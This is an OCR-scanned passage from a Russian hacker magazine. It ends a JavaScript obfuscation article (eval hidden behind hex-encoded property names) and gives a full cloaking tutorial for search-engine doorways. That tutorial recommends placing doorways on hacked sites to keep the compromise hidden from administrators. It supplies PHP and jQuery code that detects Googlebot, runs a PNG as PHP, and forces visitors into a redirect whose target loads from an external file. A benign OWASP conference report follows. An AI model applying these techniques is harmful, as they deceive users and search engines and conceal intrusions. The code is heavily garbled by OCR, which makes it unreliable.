разования нужно найти еще более высокий в иерархии объ- 
ектов элемент, который бы имел внутри себя слово «боситепі». 
Имя ему іЫб. Согласно стандартам баѵаЭсгірІ, 1Ыз не является 
объектом, а является оператором, возвращающим ссылку на 
объект. В результате теперь мы можем безболезненно исполь- 
зовать деіЕІетепіВуІб таким образом: « 1; Ь і 5 [« сі о с и т е п 1; »] 

[«д еі Еіе т епі Ву I б »] ». 

Привязка кода 

Иногда возникает необходимость написать код так, чтобы он 
выполнялся только после соблюдения некоторых условий. 
Например, мы создали баѵаЭсгірІ-код и хотим его продавать, но 
продавать мы хотим с привязкой к домену, чтобы его нельзя было 
запустить на других сайтах. 

Еще раз повторюсь: никакой абсолютной защиты не придумать в 
принципе, есть лишь некоторые способы, затрудняющие процесс 
копирования/отвязки. 
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Вот несколько типов таких привязок + данные, от которых они 
зависят: 

• привязка к домену // 1оса1:іоп . бге-Р. 5р1і1:( ' / ' ) [2] ; 

• привязка к параметрам (передаются странице после #?) // 
1оса1:іоп . М ге-Р . 5 рі іі: ( '#' ) [1] или Іосаѣіоп . И ге-р . 5 рііі: ( ' ? ' ) . 
зіісе(і) ; 

• привязка к дате // а = пем йа1:е(); 

• привязка к коду ЗаѵаБсгірІ: // кзсгірі: ісІ= " □ зсосіе " >а = 
сіоситепі: . §е1:Е1етеп1:ВуІсІ( 'ззсосіе' ) . іппегНТМІ_; </5сгір1:>; 

• привязка к коду всей страницы // а = сіоситепі:. 
§е1:Е1етеп1:5ВуТа§І\Іате( 1 ІгЬтІ ' ) [0] . іппегНТМІ_; 

• привязка к браузеру // а = паѵі^аѣог . изегА^епІ:; 

• привязка к куки-записям // сіоситепі: . соокіе; 

• любые другие привязки, которые можно придумать. 

Избегание 

подозрительных функции 

Советую также избегать явное использование функций еѵаШ, 
боситепІ.ѵѵгііеО и других. При поиске настоящего кода люди часто 
используют метод подстановки аІегШ вместо данных функций, так 
как после этого код можно сразу прочитать таким, каким мы его 
начинали шифровать, следовательно, весь смысл обфускации про- 
падает. Как же выполнить код, не используя фунцкию еѵаШ? 
Вспомним про то, что во главе всего стоит оператор 1Ыз. С помо- 
щью него функцию еѵаШ можно превратить вот в такой код: 

а = ^ІіізІф’ХхбБХхУбХхбІХхбС"] ; . 

После такого преобразования мы спокойно сможем использовать 
«аП» вместо «еѵаШ». 

Изменение 

на нечитаемые строки 

В обфусцированном коде следует использовать следующие сим- 
волы и их комбинации для обозначения идентификаторов: 

1) "о", "0 м , "0" 

2) "і", "I", "1", "1" 

3) (и варианты " ", " " ...) 

4) "$" (и варианты "$$", "$$$" ...) 

После использования подобных символов код становится крайне 
трудночитаемым, особенно если его сжать, убрав лишние пробе- 
лы и переносы строк. 

Шифрование кода 

Способов шифровки текста существует неограниченное коли- 
чество, хотя все они основаны на использовании каких-либо 
текстовых/числовых функций. Часто работает конструкция: еѵаШ 
+ функция_расшифровки() + шифрованная_строка. Попробую без 
лишней воды показать один из таких способов. 

Допустим, нам нужно зашифровать строку «аІегДі );». Мне при- 
шло в голову брать по два символа из нее, переводить их в 
числа (А8СІІ код), считывать их и рядом ставить первый символ в 
чистой (без перевода) форме. Только стоит учесть, что, разделяя 
код на такие двухбуквенные части, мы получим код примерно 
в 2-2,5 раза больше оригинала, а также нельзя забывать, что 
такие блоки лучше как-то разделять (как элемент массива или 
через разделитель). За разделитель возьмем знак «%», так как 
он делает шифрованную строку похожей на ІІПІ_-строку. Напишем 
ПРОСТОЙ РНР-СКрИПТ: 

<?рІір 

$а = "а1ег1:(1) ; 

$а = 5І:г_5р1і1:($а, 2); 



$е = ' 

Тогеасб ($а ав $ѵ) 

{ 

$е .= '%' . $ѵ[0] . (огсі($ѵ[ 0] )+огсІ($ѵ[1] )); 

} 

есІіо($е) ; 

?> 

Вот что у нас получилось: «%а 205%е2 1 5%1 1 56% 1 90% ; 59». 

А теперь напишем дешифровщик этого кода на 5аѵа5сгір1: : 

ТипсТіоп сі ( в ) 

{ 

в = б . 5р1і1:( '%' ) . 5Іісе(1) ; 
с = ' 

Тог (і = 0; і < БЛеп^ТИ; і++) 

{ 

с += б[ 0] + 5Тгіп§.ТготСІіагСосІе( 

5.5иЬв1:г(1)-5[0] .сбагСосІеАТО); 

} 

геТигп с; 

} 

Вызов кода в таком случае будет выглядеть так: «еѵа1(сІ( '%а205 
%е215%Т156%190%; 59 ' ) ) ; ». 

Теперь остается только немного обфусцировать весь этот скрипт. 
Мы не будем использовать все описанные методы, а затронем 
лишь некоторые из них: 

2 = ' 73706С697421736С 696 3652 16С 656 Е 6774682166726 Р 6043 6861 
72436 Р 64652 173 7562737472216 3686172436 Р 64654174 ' ; 

_ = у 

Тог( =0; < 2 . 1еп§1:Іі/2; ++) {_+=ипевсаре( '%'+ 2 [ *2]+г[_ 

_*2+1] ) ; } 

_ = _[_[0] + _[1] + _[2]+_[3]+_[4] ](' ! ');Типс1:і 0 п (_){_ 

= _[_[0]]('\х25')[_[1]](-~[]); _І= ' ' ; (_1=0;_1< [_ 

[2]];_1++){_І+=_[_1][0]+51:гіпб[_[3]](_[_1][_[4]](1)-_ 
[_1] [Ѳ] [_[5]]());}ге1=ипп _І;} 

Т6І5 [ ' \х65\х7б\хб1\хбС ' ] ( ( ' %а205%е215%Т156%190%; 59 ' ) ) ; 

Рассмотрим подробнее процесс работы этого на первый взгляд 
нечитабельного кода: 

1. 2 = ' ' 

Здесь переменной присваевается текст, который был получен 
переводом строки зріііізіісе ІІепдТЬ ІбготСЬагСосІе ІзиЬзІгІсІпагСосІ 
еАі в шестнадцатеричны вид (\х73\х70\х6С\х69\х74...) без «\х»; 

2 . ; Тог( . . . } 

Тут мы переводим обратно зрІіІізІісеІІепдіЬИ'готСЬа гСосІе !зи Ьзіг! 
сЬагСосІеАі в переменную «_»; 

3 . 

Разделяем строку в тех местах, где есть символ «!»; 

4. ТипсТіоп ( ){. . .} 

Описанная выше функция сІ() в обфусцированном виде; 

5. Ѣіііб [ ' \х65\х76\х61\х6С 1 ] ( ); 

Декодирование строки и запуск кода. 

Напоследок 

Ну что ж, подведем итоги. При комбинации всех этих способов 
можно быть на 100% уверенным, что простой или даже средний 
пользователь не сможет прочитать или скопировать к себе твой 
код. Но так как специалисты по компьютерной безопасности пре- 
красно знают о большинстве данных трюков, а также потому что 
я выкладываю эту информацию на всеобщее обозрение, могу 
предположить, что данные методы станут более популярными и 
известными. Я надеюсь, что ты сможешь использовать представ- 
ленную информацию в благих целях, т 
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ЛОЖКА ДЕЛЯ 
ДЛЯ 6006И 

Клоакинг 
как средство 
выживания 
в поисковых 
системах 



• Наверняка ты не раз слышал такое загадочное слово, как клоакинг. 
Обычно его используют при общении на черных оптимизаторских 
форумах люди со статусом «ТопМастер». Сам по себе статус 
топмастера подразумевает очень приличный заработок на поприще 
5Е0. Сегодня мы попытаемся понять, каким образом связаны 
приличные суммы американских президентов и применение 
технологий клоакинга при создании дорвеев, а также разберем всю 
сущность этого метода поисковой оптимизации в текущих реалиях. 



Матчасть 

Клоакинг — это «черный» ЗЕО-прием, который использу- 
ется дорвейщиками для того, чтобы выдавать различную 
информацию на одной и той же странице поисковику и 
пользователю. 

Ты спросишь, для чего нужно такое разграничение? 

Очень просто. Применение данной технологии позволяет 
существенно увеличить время жизни страниц, нацеленных 
на быстрый сбор трафика (дорвеев). Теперь давай немного 
углубимся в суть клоакинга. Итак, допустим у нас есть спе- 
циально подготовленная страница, в которой мы приме- 
няем клоакинг. При заходе на такую страницу поисковый 
робот увидит специально оптимизированную пагу, где ему 
не будут видны редиректы, баннеры и другие промомате- 
риалы, к которым поисковые машины относятся крайне 
негативно. Пользователь же может увидеть два типа стра- 
ниц: страница для пользователя («серчера»), пришедшего 
с поисковика и страница для всех других пользователей, 
не попадающих под определенные условия. В первом 
случае пользователь видит страницу с промоматериалами, 



ссылающимися на предмет его поиска, и не видит всей 
той грязной внутренней оптимизации для поисковика, 
которая могла бы его спугнуть. Во втором случае пользо- 
ватель может увидеть совсем другую страничку, в корне 
отличающуюся от двух предыдущих, описанных выше. В 
последнее время клоакинг используется на взломанных 
сайтах, которые уже имеют множество внешних ссылок, и 
где уже была какая-то информация (данный факт является 
несомненным плюсом для боодіе). Такой подход является 
самым актуальным на текущий момент и позволяет: 

1. Увеличить время жизни нашего дорвея (если мы сде- 
лали его на чужом ресурсе). 

2. Долгое время скрывать факт хака от администратора 
сайта. 

Также стоит отметить, что с точки зрения поисковых 
систем клоакингом не считается использования географи- 
ческого положения и особенностей браузера при построе- 
нии страницы, поэтому на многих безобидных белых сай- 
тах используется некое подобие клоакинга. 

Теперь настало время перейти к практике. 




1 НТТР://УУУУУУ| 



1 I 

> Ипкз 

^зсотргезз.сот — 

легкий обфускатор 
^ѵаЗсгірІ кода. 

• /сот -библио- 
тека ^иегу. 

• асІсІопз.тогіЦа.огд/ 
еп-ІІЗЛігеіох/асІсІоп/ 
тосІТѵ-ЬеасІегБ — 
тосіііу Ьеасіегздля 
РігеРох. 
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Промо для пользователя 

Идентификация 

Существует четыре способа идентификации пользователей и ботов: 

• НТТР геТеггег; 

• ІІзег-А^епІ:; 

• ІР-адрес; 

• поведенческий анализ с помощью ЗаѵаБсгірІ:. 

Типичный пример идентификации поискового робота в логах НТТР- 
сервера ты можешь увидеть на соответствующем скриншоте. В целом 
же, все эти способы можно и нужно использовать вместе, потому 
что только тогда они дадут максимальную пользу для твоих дорвеев. 
Теперь поговорим о каждом из способов отдельно. 

НТТР геТеггег 

Первый и по праву основной метод — это парсинг и анализ заголовка 
НТТР геТеггег. 

С помощью данного метода мы сможем узнать следующие важные 
детали: 

1. Откуда на наш дорвей пришел пользователь. 

2. Является ли данный пользователь серчером. 

Простейшая реализация проверки реферрера без получения исходно- 
го поискового запроса выглядит так: 

< РрНр 

ІТ (5і:г5і:г($_5ЕКѴЕК[ ’НТТР_КЕРЕКЕК' ] , 

"ІіТТр://§оо§1е. ") 

есбо 'Информация выдаваемая серчеру'; 

еізе 

есбо 'Информация выдаваемая другим'; 

?> 

Стоит отметить, что подмена заголовка с реферрером не содержит в 
себе каких-либо трудностей, поэтому поисковые роботы могут маски- 
ровать себя под обычного серчера. В большинстве случаев НТТР 
геіеггегу поисковых роботов отсутствует. 

ІІзег-Адепі 

Почти каждый НТТР-клиент указывает информацию о себе в 
поле «ІІзег-АдепІ» заголовка запроса. Этот параметр также не 
составит труда подменить или просто не указывать. Для лучшего 
понимания полезности данного заголовка разберем юзерагент 
гу гл о бота. 

Итак, поисковый робот Ѳоодіе имеет несколько версий и, соответ- 
ственно, различающийся от версии к версии ІІзег-АдепІ;. 

Вот несколько видов юзерагента гугла: 

• Мо2І11а/5.0 (сотраІііЫе; Соо§1еЬо1:/2. 1; 

+ІгМ:р : / /шм . §оо§1е . сот/ боѣ . ІгЬтІ ) 

• Соо§1еЬо1:/2.1 (+Іі1:1:р://ыыы.§оо§1е.сот/Ьо1:.Іі1:т1) 




Настройка расширения ЛЛосПІу Неасіегз 

Достоверно известно, что иногда Ѳоодіе заходит под видом обычного 
пользователя, указывая в качестве ІІзег-АдепІ; один из популярных 
браузеров или просто пустое поле. Мы не будем собирать всю базу 
агентов гугла, а просто проверим все вхождения слова доодіе в юзера- 
гент с помощью одного из простейших способов на РНР: 

< РрМр 

(5І:гІ5І:п("§оо§1е'Д $_5ЕКѴЕК["НТТР_ІІ5ЕК_АСЕМТ"] ) ) 
есбо 'Это бот' ; 

?> 

ІР-адрес 

Для реализации данного способа нам потребуется база ІР-адресов 
гугла. За основу ты можешь взять базу, которую я заботливо положил 
на наш диск, но учти, что использовать только ее одну крайне нежела- 
тельно. Для удобства мы будем использовать базу в виде регулярных 
выражений, таким образом, у нас появится возможность удобного 
указания подсетей. 

Также у каждого ІР-адреса мы будем проверять Ьозіпате на наличие в 
нем слова доодіе: 

< РрМр 

$5І:ор_ір5_та5к5 = аггау( 

" 66 \. 249 \. [ 6 - 9 ] [ 0 - 9 ]\. [ 0 - 9 ]+", 

" 70 \ . 91 \ . 180 \ . 25 " , 

" 81 \ . 159 \ . 49 \ . 212 " ) ; 

-Рогеасб ( $5І:ор_ір5_та5к5 аз $ѵ ) 

{ 

( рге§_таѣсІі( '# Л '.$ѵ.'$#Д $_5ЕКѴЕК[ ' КЕМОТЕ_АООК' ])) 

{ 

есбо 'Это бот' ; 

Ьгеак; 

} 

} 

(5І:про5(§е1:Іі05І:ЬуасІсІг($_5ЕКѴЕК[ ' КЕМОТЕ_АООК' ] ) , '§оо§1е' )) 
есбо 'Это бот' ; 

?> 

Данный способ является одновременно самым сложным и самым 
действенным, поэтому его использование при клоакинге не просто 
желательно, а обязательно. 

Сбор ІР-адресов 

Так каку гугла постоянно появляются новые подсети ІР-адресов, 
вся сложность предыдущего метода заключается в их сборе и 
обновлении. Один из способов сбора адресов роботов заключа- 
ется в создании видимой только для них ссылки на специальный 
скрипт, сохраняющий ІР-адреса всех обращений к этому скрипту: 



<сііѵ 5І:у1е="сІІ5р1ау : попе" ха бгеТ= Чаг^еі:. рбр ' >с1іск</ах/сІіѵ> 
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сс.нэ п,*ь - - тпрхти.и-.ѵ.ы -оші *«т / ѵтп.г ім і$о *-" ъ і«ее*«ы*? <±>щ*ъ<ч;2,и 

и - - [Ку^г^диптмцл -дыщ -лет ;.ді- іттт?,/:.э- ;рд да ■-■ тыицу&.-а іевщічьа»; -едвень^ и »щтргу/ыіт авс?іі ■№ і ьді.мдіі ■ 

Поисковый робот в логах НИР-сервера 



Сам скрипт сохранения ІР-адресов будет выглядеть так: 

< РрГір 

$Т = Тореп ( ' Ь эбѳ . іхі ' ^ ' а+ ' ) ; 

Тыгі1:е($-Р^5І:г_гер1асе( ' . ' ^ ' \.', "'" . 

$_5ЕКѴЕК[ ' КЕМОТЕ_АООК ' ] . " ' Дп" ) ) ; 

-РсІ 05 е($-р) ; 

?> 

Чем дольше скрипт будет собирать ІР-адреса, тем лучше. Перед 
началом использования обновленной базы обязательно очисти ее от 
дублей. 

^-клоакинг 

Данный способ является совершенно новым направлением в клоа- 
кинге, с помощью него можно придумать кучу уловок, позволяющих 
перехитрить поискового робота. Так как в настоящее время эмуля- 
ция ^ѵаЗсгірІ в боодіе оставляет желать лучшего, хитрые дорвей- 
щики и придумали некоторые трюки, которые поисковая машина 
просто не сможет понять. В целом же, применение ^-клоакинга 
позволяет успешно анализировать поведенческий фактор и более 
точно определять «человечность» клиента. В качестве примера 
я буду использовать библиотеку Лбиегу, так как она существенно 
облегчит написание кода и усложнит его разбор эмулятором. 

Сразу же хочу предупредить, что, используя баѵабсгірі-код, ты дол- 
жен обязательно пропустить его через обфускатор, так как это нехи- 
трое действие существенно усложнит разбор кода как машинам, так 
и твоим коллегам по цеху. Но не перестарайся, потому что за слиш- 
ком сильно зашифрованный код гугл наносит санкции. 

Поведенческий анализ 

Что в первую очередь делает пользователь после захода на нужный 
ему сайт? Правильно, он начинает выполнять какие-то действия, 
например: движения мышью, нажатие клавиш, прокрутка скроллом, 
изменение размеров окна и т.д. Именно эти действия мы и будем 
отлавливать, а также применим несколько хитрых уловок, о выпол- 
нении которых для каждого отдельного пользователя гугл не сможет 
сказать однозначно. 

В качестве первого примера я покажу, как можно отловить действия 
пользователя на странице с помощью Лбиегу: 

$(сІоситеп1:) .геасІу(-Рипс1:іоп () { 

$ (ыіпсіоіл/) . ЬІПСІ ( 

'сііск тоизетоѵе бсгоіі гезііе кеусіомп ' Дипс1:іоп(еѵеп1:) { 
аІегіД'Ты совершил: Чеѵепіі.іуре); 

}); 

}); 

Результат работы данного скрипта ты сможешь увидеть на соответ- 
ствующем скриншоте. 

Трюк с картинкой 

Теперь я покажу пример небольшой хитрости, с помощью которой 
мы сможем более точно убедиться, кто именно просматривает теку- 
щую страницу. Для начала создадим файл с названием іппаде.рпд и 
вставим в него следующий код: 

< РрГір 

і-Р(б1:гІ5і:г( "§оо§1е" , $_5ЕКѴЕК[ м НТТР_и5ЕК_АСЕІ\ГГ ] ) ) 

{ 

ЬеасІег( ’Сопіепі-Туре: іта§е/рп§' ); 



геасНй1е( ' іта§е2 . рп§ ' ) ; 

> 

еізе 

{ 

Ьеасіег ( ' НТТР/1 . 1 404 N 0 * РоипсІ ' ) ; 

6 іе(); 

} 

?> 

Далее включим интерпретацию кода в файлах с расширением рпд, 
создав файл .Ыассезз с таким содержимым: 

АсІсІТуре аррІісаТіоп/х-ІіІіТрсІ-рІір . рп§ 

С помощью баѵабсгірі выведем эту картинку на экран и проверим, 
загрузилась ли она на нашей странице: 

сІосишеп1:.іл/гі1:е( '<іт§ 5гс="іта§е. рп§"/> ' ); 

$(сІоситеп1:) .геасІу( ипсТіоп () { 

$( , іт§[5гс*="рп§"] ' ) .еггог(-Рипс1:іоп () { 
а1ег1:( 'Ошибка при загрузке картинок' ); 

}) 

}); 

Что у нас получилось? При обращении картиночного робота к іппаде. 
рпд он видит безобидную картинку, в то время как пользователь 
вместо этой картинки получает ошибку 404. В это же время наш 
баѵабсгірі-код проверяет, были ли ошибки при загрузке картинки (а 
они как раз будут, не забывай о выданной пользователю странице). 
Таким образом, эмулятор баѵабсгірі-робота боодіе не сможет понять, 
что происходит с обычным юзером. Картинку робот видит, в коде есть 
проверка на ошибки, то есть даже если он сможет понять, что тут за 
проверка, то все равно пойдет по другому пути, с рабочей картинкой. 

Промо 

Чтобы добиться максимального количества переходов, нам нужно 
навязать определенные действия пользователю. Поэтому, как только 
мы поймем, что это не робот, на пользовательский экран сразу же 
выведется красивая информация с промо, при этом скрывая все, что 
написано на странице. 

В качестве примера приведу следующий код: 

сІосишеп1:.іл/гі1:е( Чсііѵ ісІ="сІіа1о§" Іа55="ыіпсІоы"> <іт§ 
5гс="ргото.др§" 5іу1е="сиг50г: роіпіег; "> </сііѵ> <сііѵ 
2ісІ="та5к"х/сІіѵ> ' ); 

$(сІоситеп1:) . пеасІу( ипсііоп () { 

$("#сІіа1о§") . С55 ( 'роБІііоп ' , ' аЬБОІиіе ' ) ; 

$("#сІіа1о§") .сбб( ' сіізріау ' „ 'попе' ); 

$("#сІіа1о§") .С55( '2-іпсІехД '9999' ); 

$( "#та5к" ) . С55 ( ' роБІііоп ' , ' аЬБОІиіе ' ) ; 

$("#та5к") . сбб( ' Іе-РІ: '0'); 

$("#та5к") . сбб( Ч ор' , ' 0 ' ) ; 

$("#та5к") . С55 ( ' 2 -іпсІехД '9000' ); 

$("#та5к") .сбб( ' Ьаск§поипсІ-со1оп ' , '#000000' ); 

$("#та5к") .сбб( ’сІІБрІау Д 'попе' ); 

$(ыіпсІоы) .ЬіпсІ ( 'тоиБетоѵе бсгоіі геБІге кеусІоыпД 
■Рипсііоі (еѵе) { 

ѵаг та5кНеі§Ы: = $(сІоситеп1:) .Ьеі§Ы:(); 
ѵаг таБкІлІісІіЬ = $(ыіпсІоы) .ыісІ1:Ь(); 

$( '#та5к' ) . С55 ({ 

'ыісііЬ ' : таБкІлІісІІіМ ^ 
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' Меі^Ы: ' : та5кНеі§ІтІ: 

}); 

$С#та5к').-РасІеІп(1000); 

$( '#та5к' ) .ТасІеТо("5Іоіл/" , 0.90); 

$(''#та5к м ) .сбб( 'Ьаск§гоипсІ-со1ог' , '#000000' ); 
ѵаг міпН = $(ыіпсІоы) . Неі§ІгІ: ( ) ; 
ѵаг ыіпілі = $(ыіпсІоы) .ыісІ1:Іі(); 

$("#сІіа1о§") .сбб( Чор', міпН /2- 
$("#сІіа1о§").Ііеі§Іі1:() / 2); 

$("#сІіа1о§") .сбб( ' Іе-Рі: ' , міпілі / 2 - 
$("#сІіа1о§") .ішШі() / 2); 

$("#сІіа1о§") .-РасІеІп(2000); 

$(ыіпсІоы) . ЬіпсІ ( ’сііск' , гіпсЬіоп (еѵепі:) { 

$ (1:ИІ5 ) .1оасІ( ' рІЧхІ: ' , -РипсТіоп (геБр) { 
еѵа1( 'ыіпсіоы.іосаіііоп = " ' + геБр + '";'); 

$ (іііпіб ) . ипЬіпсІ (еѵепі:); 

});});});}); 

Как только пользователь начинает совершать какие-то действия, 
мы сразу же затемняем фон и выдаем картинку, при переходе на 
которую юзер будет перенаправлен на ссылку, находящуюся в 
файле рІ.М. Вынося ссылку в отдельный файл, мы скрываем ее от 
любопытных глаз, а также получаем возможность подгружать ее со 
стороннего ресурса. Данный метод является не самым оптималь- 
ным из-за того, что он навязывает действия серчеру, в результате 
чего пользователь уходит с нашей странички за очень короткий 
промежуток времени. 

Ты должен понимать, что, чем дольше пользователь проводит вре- 
мени на твоей странице, тем лучше эта страница выглядит в глазах 
поисковых систем. Поэтому здесь стоит выбрать что-то одно: больше 
пользователей за меньшее время или меньше пользователей за 
большее время. 

Эмуляция серчера 

После того как ты решился использовать клоакинг, тебе наверняка 
захочется протестировать его в боевых условиях, поэтому давай пред- 
ставим тебя тем самым серчером :]. Итак, чтобы сделать вид, как будто 
ты пришел с поисковика, ты можешь использовать замечательное 
дополнение для РігеРох под названием Мосіібу Неабегз. 

Здесь я не буду описывать работу с М осі ібу Неасіегз в силу его 



интуитивно понятного интерфейса, а опишу лишь необходимые 
действия: 

1. Добавь новый заголовок и укажи в нем такие значения: 

АсТіоп = Мосіі-Ру 

Мате = КеТегег 

Ѵаіие = ІгІ:1:р://§оо§1е.сот 

2. Ріа вкладке Орііопз поставь галочку «Аіѵѵауз оп». 

3. После этого открывай свою проклоаченную страничку и проверяй 
работоспособность своих скриптов в качестве серчера. 

Обобщение 

Теперь настало время обобщить все способы и собрать полноценный 
скрипт клоакинга. 

В данном скрипте будут присутствовать следующие способы: 

• проверка ІІзег А§еп1:; 

• проверка КеТеггег; 

• проверка ІР; 

• проверка на действия пользователя; 

• проверка картинкой; 

• подгрузка ссылки для перенаправления из стороннего файла; 

• красивый способ выдачи промо и сокрытия контента, 
задерживающие пользователя на страничке. 

Полную реализацию скрипта с базой ІР-адресов ты можешь взять 
с нашего диска. Если на твоем сервере нельзя использовать 
.Ыассезз, то просто удаляй картинку, и скрипт все также останется 
работоспособным. 

Вредный Ооодіе ТооІЬаг 

Ни для кого не секрет, что у Ооодіе есть своя панель инструментов, 
устанавливаемая во все популярные браузеры, так называемый 
Ооодіе ТооІЬаг. Кроме видимых для юзера функций в нем при- 
сутствуют еще и скрытые модули, которые передают поисковому 
гиганту пользовательскую информацию о посещаемой странице. 
Еще несколько лет назад Ооодіе ІооІЬаг можно было легко опре- 
делить с помощью ]аѵазсгірІ, сейчас же это не представляется 
возможным. При большом количестве трафика информация с тул- 
бара начинает учитываться поисковиком, и тут наш клоакинг ста- 
новится бесполезным. Роботы начинают понимать, что страницы, 
видимые ботом и клиентом, различаются. Пока тулбар даст понять 
Ооодіе, что на данном сайте используется клоакинг, может прой- 
ти много времени, поэтому тебе не стоит сильно волноваться по 
этому поводу. Проблема тулбара является одной из проблем, кото- 
рые могут помешать скрыть от гугла перенаправление пользова- 
теля на нужный нам лендинг и приносить трафик максимальное 
количество времени. Другой проблемой является поведенческий 
фактор, который гугл также успешно учитывает, если пользова- 
тель слишком быстро уходит со страницы. При обнаружении поис- 
ковиком механизмов клоакинга на сайт накладываются жесткие 
санкции, поэтому использовать данную технологию нужно с умом 
и максимально правильно. 

Заключение 

В данной статье мы подробно разобрали такую интересную вещь, как 
клоакинг. Я надеюсь, что теперь ты и сам сможешь придумать еще 
более хитрые способы обмана поисковых систем. 

Если ты собрался использовать клоакинг на практике, то обяза- 
тельно собери свою полную базу ІР-адресов и тщательно проверь 
ее. Также не используй на постоянной основе одну и туже види- 
мую пользователю часть Уаѵазсгірі, промоматериалы), иначе гугл 
легко сможет пометить все твои странички как одну большую сеть 
дорвеев. Чем легче определить твой клоакинг, тем быстрее ты 
попадешь в бан. т 
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взлом 



■ ■ Тарас «охсі еТ» Иващенко (охсІеЬіпГо) 



0ѴѴА8Р АРР5ЕС Е1Ж0РЕ 2011: 

КАК ЭТО БЬ ІЛО? 

Отчете крупнейшей конференции 
по веб-безопасности вЕвропе 

• Как бы мог быть взломан ТѵѵіНег, зачем нужны сканеры 
безопасности в ІВМ, какие новые технологии появились для защиты 
браузера, что поможет при реверсинге мобильного приложения? Добро 
пожаловать, наверное, на лучшую конференцию по веб-безопасности в 
Европе. Попробую рассказать, как это было. 



ІпТго 

Если для тебя слова Х55, СЭРЕ, ЗСИ_і, СІіскШаскіпд что-то значат, 
то ты наверняка слышал и о таких организациях, как 0ѴѴА5Р и 
ѴѴА5С. ТЬе Ореп ѴѴеЬ Арріісаііоп Эесигііу Рго)есІ (0ѴѴА5Р) — это 
открытое сообщество и одноименная некоммерческая организа- 
ция, которая ставит себе сложную цель сделать так, чтобы безо- 
пасных приложений было как можно больше. Для этого ведется 
пропаганда безопасности в целом, а на сайте публикуются раз- 
личного рода документы, охватывающие все аспекты разработки 
и тестирования веб-приложений. Наиболее известным примером 
подобного материала является список 10 наиболее критичных 
рисков безопасности веб-приложений — ОѴѴАЭРТорІО (если 
посмотреть вакансии на должность инженера по ИБ, то хорошее 
понимание уязвимостей из этого списка является обязательным 
требованием — прим. ред.). Помимо публикации полезных мате- 
риалов в рамках сообщества разрабатывается большое число 
утилит, среди них — популярные прокси для анализа НТТР- 
трафика ѴѴеЬБсагаЬ и Іед Аііаск Ргоху, мощный набор правил 
для ѴѴАР МосІЭесигіІу, обучающее основам веб-уязвимостей окру- 
жение ѴѴеЬОоаІ и многое другое. А для того чтобы вовлеченные 
люди могли общаться и делиться знаниями, проводятся различ- 
ные профильные конференции. Так вот АррЭес Еигоре 201 1 явля- 
ется самым главным событием 0ѴѴА5Р и, имхо, самым главным 
событием для веб-безопасников в Европе. 

ОѴѴА5Р АррЗес 

0ѴѴА5Р АррЭес стартовал еще в 2004 году в США и 2005 году в 
Европе и постепенно вырос в серию ежегодных конференций 
«под единым флагом» по всему миру, включая обе Америки, 
Европу, Азию, Австралию и Израиль. Городом проведения 
европейского отделения в этом году стала столица Ирландии 
Дублин, а в качестве места проведения мероприятия был выбран 
самый известный университет этой страны — Тринити-колледж 
(Дублинский университет]. Мероприятие проходило четыре дня 
(с 7 по 1 1 июля), первые из которых были отданы на тренинги, 
вторые же два — посвящены докладам. Тренинги как всегда 
кусались ценами, поэтому я решил в этом году обойтись без них. 



Доклады были разделены на три параллельные секции (защи- 
та, предотвращение, атака), среди которых не всегда удавалось 
однозначно выбрать наиболее интересный доклад и приходилось 
чем-то жертвовать (это обычное дело с параллельными секция- 
ми]. К слову сказать, конференция получилась достаточно пред- 
ставительной. Среди спикеров можно было увидеть как предста- 
вителей известных компаний и организаций: БогіТу/НР, АбоЬе, 
ІВМ, Ѵегігоп, Місгобоіі, так и просто интересных людей. К сожа- 
лению, я на этом мероприятии в этот раз был только в качестве 
слушателя, мучившего спикеров вопросами :). 

День первый 

Итак, первый день начался для меня с доклада Дэвида Стабли 
из 7 Еіетепіз Ш на модную нынче тему и непаханое поле для 
троллинга — АРТ :). АРТ в данном случае — это вовсе не пакет- 
ный менеджер, как могли бы подумать поклонники ОеЬіап ОІЧІІ/ 
Ыпих. АРТ есть АбѵапсесІ Регзізіепі ТбгеасІ или «постоянная про- 
двинутая угроза» (хотя и «целенаправленная угроза» на слух чуть 
получше буквального перевода). Иными словами, даже установив 
все обновления безопасности, закрыв все порты на файрволе 
и заблокировав все социальные сети, ты все равно чувствуешь, 
что сделано недостаточно. Всегда есть опасение, что даже самую 
надежную защиту могут «пробить», если это будет кому-то очень 
надо, и если закажет кто-то серьезный. Радуйтесь менеджеры по 
продажам ИБ решений (наш продукт защищает даже от АРТ!) и 
трепещите директоры по безопасности крупнейших (и не очень) 
компаний — АРТ идет! :) Дэвид кратко рассказал о том, как он 
понимает АРТ, о нашумевших последних случаях, которые так или 
иначе ассоциируют с этим термином. 

Удивил доклад «Как стать админом твиттера: введение в атаки 
на современные веб-сервисы» Андреса Фалкенберга из Рурского 
университета. Стало сюрпризом то, что на самом деле в докладе 
рассматривалась гипотетическая атака, а вовсе не реальный 
случай. Это, конечно, расстроило, но тем не менее, само по себе 
выступление получилось интересным и было посвящено атакам 
на веб-сервисы (в частности программные интерфейсы популяр- 
ных облачных сервисов), предоставляющих ЭОАР-интерфейс. И 
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Дублин красив, много пабов и гиннеса :) 



конкретно на механизм защиты ХМІ_ Зідпаіиге путем 
обертки подписанных ХМІ_-объектов, которые адресу- 
ются по ісі в другие, но уже со вставкой своей коман- 
ды. Получается, что для серверной части подписанная 
команда проходит валидацию нормально, но при этом 
выполнится совсем другая, подсунутая злоумышлен- 
ником! Доклад получился достаточно живым и стал 
одним из наиболее интересных с технической точки 
зрения на конференции. 

Неожиданно интересным получился доклад, а также 
секция вопросов-ответов от Марка Кросби из гиганта 
ІВМ про их опыт интеграции контролов безопасности 
в цикл разработки программного обеспечения. Что, 
если раздать разработчикам веб-приложений предна- 
строенные сканеры уязвимостей и попробовать заин- 
тересовать их вопросами безопасности таким обра- 
зом? Начнут ли они писать более безопасный код? 

А что, если устроить целое состязание в шуточной 
форме? Чувствуется, что в ІВМ в отделе безопасности 
экспериментируют с мотивацией разработчиков и 
даже пытаются подходить к этому с юмором и высокой 
долей оригинальности :). 50Ю был вообще популяр- 
ной темой на конференции, правда не всегда это было 
на благо и в итоге было достаточно много «пустых» 
спонсорских докладов. 

Замыкал первый день конференции для меня немного 
скучный доклад «Основы Руібоп для тестировщиков 
веб-приложений» от Джастина Сирла из ІпѲиагсІіапз 
Іпс. «Почему скучный?», — спросишь ты. Очень про- 
сто, сейчас уже мало кого можно удивить знанием 
Руібоп, и он, имхо, уже перенимает звание языка 
номер один для пентестера у могущественного РегГа. 

А коль ты пентестер веб-приложений и заинтересо- 
вался питоном, то библиотеки игШЬ/ЫТрІіЬ ты уже 
наверняка расковырял и знаешь хорошо! Так что 
посвящать этому целый доклад немного странно. 

